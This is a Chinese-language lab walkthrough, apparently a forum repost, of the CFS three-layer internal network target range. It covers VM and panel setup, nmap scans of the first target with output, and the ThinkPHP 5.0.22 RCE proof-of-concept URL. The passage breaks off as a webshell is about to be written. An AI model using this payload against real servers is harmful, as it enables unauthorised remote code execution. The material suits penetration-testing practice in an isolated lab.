CFS三层靶机-内网环境渗透
靶场介绍及环境配置三个主机的网络环境拓扑图,攻击机的网段在192.168.236.0/24,三台靶机的IP地址分别如图:
https://img2023.cnblogs.com/blog/3074366/202302/3074366-20230209225152961-488534575.png
上面的 Target1、2、3分别对应CentOS7、Ubuntu、Windows7 三台主机。
(1)网卡配置
注意:在编辑虚拟网卡的时候,不要勾选红圈那个选项,否则后面代理就就没有意义了。.ova文件导入到VM之后可以打开虚拟机,使用root:teamssix.com登录主机,通过ifconfig检查网络情况是否正常。
https://img2023.cnblogs.com/blog/3074366/202301/3074366-20230131211728662-1333631746.png
(2)宝塔配置
其中Target1和Target2主机需要我们自己去宝塔后台配置一下(靶机描述信息里有密码 root:teamssix.com):
进入宝塔面板,选择网站,再点击网站名,将centos靶机中c段为236的那个ip添加进去,确保能够访问到对应的web页面
https://img2023.cnblogs.com/blog/3074366/202302/3074366-20230201000430993-611261632.png
Target1
(1)nmap扫描存活主机
#扫描段内存活主机
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.236.0/24
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00019s latency).
#nmap扫描一下 Target1 开放的服务
┌──(root㉿kali)-[~]
└─# nmap -A -p 1-65535 192.168.236.141
Nmap scan report for 192.168.236.141 (192.168.236.141)
Host is up (0.00082s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp openftp Pure-FTPd
22/tcp openssh OpenSSH 7.4 (protocol 2.0)
80/tcp openhttp nginx
111/tcpopenrpcbind 2-4 (RPC #100000)
888/tcpopenhttp nginx
3306/tcp openmysql MySQL (unauthorized)
8888/tcp openhttp Ajenti http control panel
MAC Address: 00:0C:29:61:BA:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop可以看见开放了 21、22、80、111等等端口,我们访问一下80的http服务
访问192.168.236.141 站点不存在,192.168.236.141/index.php 404是因为宝塔后台配置的原因,按照前面提到的宝塔配置之后就不会出现这个情况。
(2)利用thinkphp-5.0.22 RCE漏洞拿shell
访问80端口开放的http服务
https://img2023.cnblogs.com/blog/3074366/202302/3074366-20230201001424258-1611965800.png
访问后发现这是一个用thinkphp5版本搭建的网站,thinkphp5版本是有漏洞的,这里我们直接上thinkphpGUI工具,检测一下,发现存在ThinkPHP 5.0.22/5.1.29 RCE
poc为:http://192.168.236.141/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars=phpinfo&vars[]=-1https://img2023.cnblogs.com/blog/3074366/202302/3074366-20230201001757626-1027791401.png
直接GetShell没通,无伤大雅,那我们执行命令去生成一个一句话木
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]